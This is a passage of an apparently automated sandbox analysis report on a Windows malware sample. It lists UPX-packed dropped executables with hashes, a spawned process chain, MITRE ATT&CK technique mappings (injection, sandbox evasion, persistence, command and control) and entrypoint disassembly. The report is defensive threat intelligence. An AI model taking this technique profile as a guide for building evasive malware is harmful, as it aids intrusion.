(PID: 3248)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xrfrdxf.exe", "file_path": "C:\\xrfrdxf.exe", "file_size": 342909, "sha256": "e9f4d780679b471c4ba48a829b65a5bf5c8f6d34178140f0eb376bea8b65ef58", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ffpprbb.exe (PID: 900)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xrtxff.exe", "file_path": "C:\\xrtxff.exe", "file_size": 342945, "sha256": "44610fd9cd2997e5013af5b0bece07e57b163363c6b182b7bf8a5493f6173626", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "brbjvx.exe (PID: 3976)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2824064.exe", "file_size": 343313, "sha256": "7ee480cdfc10892916856c14e5e57b93b74e9f1bb61b1a80c976f9975d74551c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "686826.exe", "file_size": 343296, "sha256": "6a77dfde8e7efef1a62e88cf872861185dd1a8a37820af63d43b92e0219218ee", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4460482.exe", "file_size": 343281, "sha256": "8daede577448080f9c05e9ded4b4fbe6fff17b3b397c92742533a86a5bd132f0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "60026.exe", "file_size": 343262, "sha256": "e957862513a3653c50f621c7a30b630a47f0741a6341167b4da4363a1205aa6a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "0628066.exe", "file_size": 343249, "sha256": "30b6b5f8ad41cb9a8aea72eb0d52a910aa2035fe1276dcb9aea40fcbcb31046f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "422622.exe", "file_size": 343235, "sha256": "63d7fef5f7dbaf6ace97109586ef64db1c5e386d8f2b3378b30e18f0569c2c76", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4284246.exe", "file_size": 343218, "sha256": "eadeed48d839c193efaa5012dc4da1482a5d321f4011e33900392cde37cbd25c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xdfpfx.exe", "file_size": 343198, "sha256": "6d6b747b1da4af629a40ddfdda09abcb57c00d75dafa07216c2a5b3120c6f6e1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rhvphd.exe", "file_size": 343185, "sha256": "0bc8609b57bc07239603de96ed4b1af51fe46b3c8f46fe001cbd2c0d67dc34d5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xltnrpf.exe", "file_size": 343174, "sha256": "d58da982210a540836b4e035e5bf883e7b94b2f3df7dbf5115834326d578ae36", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vlrlrxl.exe", "file_size": 343158, "sha256": "5b70b1a1388aff4d997bd3e1fb19217542c793eeb351e8285b5c11f3cf61c9e4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bdjjvlh.exe", "file_size": 343147, "sha256": "b49296f22ec07b3bd41f810f74bb5009192873f62df143aafb1fe457b4317dcf", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4060084.exe", "file_size": 343128, "sha256": "57f266d79ded18e1e7e70be66a8cb32a3eecc4c191ac9cb3ab65bd382301a19c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "084822.exe", "file_size": 343109, "sha256": "0c8ada9fdc8dd33e7c3b9cea35ae968397c06565ca5c7b9feed7a91e5c7998c9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "822462.exe", "file_size": 343061, "sha256": "1423c5f0a37b2b17d6c991024638ee2d514c833db6baa1079c9ce7f1d92d8257", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8024206.exe (PID: 4212)", "threat_level_readable": "no specific threat"}], "processes": [{"uid": "00000000-00005920", "name": "4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe", "normalized_path": "C:\\4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe", "sha256": "4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f"}, {"uid": "00000000-00005988", "parentuid": "00000000-00005920", "name": "dhxhp.exe", "normalized_path": "c:\\dhxhp.exe", "sha256": "69a81abb8f31649de32e91b3bb38bc28a44179febe37dbd0b650371729e2897c"}, {"uid": "00000000-00005940", "parentuid": "00000000-00005988", "name": "lnvjpll.exe", "normalized_path": "c:\\lnvjpll.exe", "sha256": "079b6f599d31e78de88a0f230da005e4ba628d4ae18abc54dac97ab202a6eed0"}, {"uid": "00000000-00005896", "parentuid": "00000000-00005940", "name": "0020002.exe", "normalized_path": "c:\\0020002.exe", "sha256": "4767bccfbc3627a43d7415ebfe17c2630fc88b1e20eea89ba28620a7644d14dd"}, {"uid": "00000000-00004124", "parentuid": "00000000-00005896", "name": "802862.exe", "normalized_path": "c:\\802862.exe", "sha256": "b07de5065b7ba0433e1877479339d884893fc147d490fa23d751bc94e2d73c3a"}, {"uid": "00000000-00004400", "parentuid": "00000000-00004124", "name": "824686.exe", "normalized_path": "c:\\824686.exe", "sha256": "f3e14519e114ada80e528ed760c27f975d7f6a9d230bb9b3553ed006f13bc328"}, {"uid": "00000000-00004128", "parentuid": "00000000-00004400", "name": "0228060.exe", "normalized_path": "c:\\0228060.exe", "sha256": "915b37da5e4954ba604c97cb8b7e02e2ecc589ca1c52c30126252f7d849f9dc1"}, {"uid": "00000000-00006140", "parentuid": "00000000-00004128", "name": "4404242.exe", "normalized_path": "c:\\4404242.exe", "sha256": "d50e88d2cf9516093040bf3063e41cd11d7250658d4bf22997f1009f26af9189"}, {"uid": "00000000-00004308", "parentuid": "00000000-00006140", "name": "dvrdf.exe", "normalized_path": "c:\\dvrdf.exe", "sha256": "e8674f84de8d161e8bc7c811affb53705beb588b637eeb487c2d56edb1e00ff9"}, {"uid": "00000000-00004324", "parentuid": "00000000-00004308", "name": "nrdphjv.exe", "normalized_path": "c:\\nrdphjv.exe", "sha256": "517e048d6f2de0b9e391b00f18af92a0ac234010738d20b1320b29085836248e"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"2824064.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"686826.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4460482.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"60026.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"0628066.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"422622.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4284246.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xdfpfx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rhvphd.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xltnrpf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"vlrlrxl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"bdjjvlh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4060084.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"084822.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"jhftx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4602048.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"822462.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"8024206.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"664222.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"6264048.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"666086.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"thbfpv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ttnbl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ptfff.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"2824064.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"686826.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"4460482.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"60026.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"0628066.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"422622.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"4284246.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"xdfpfx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rhvphd.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"xltnrpf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 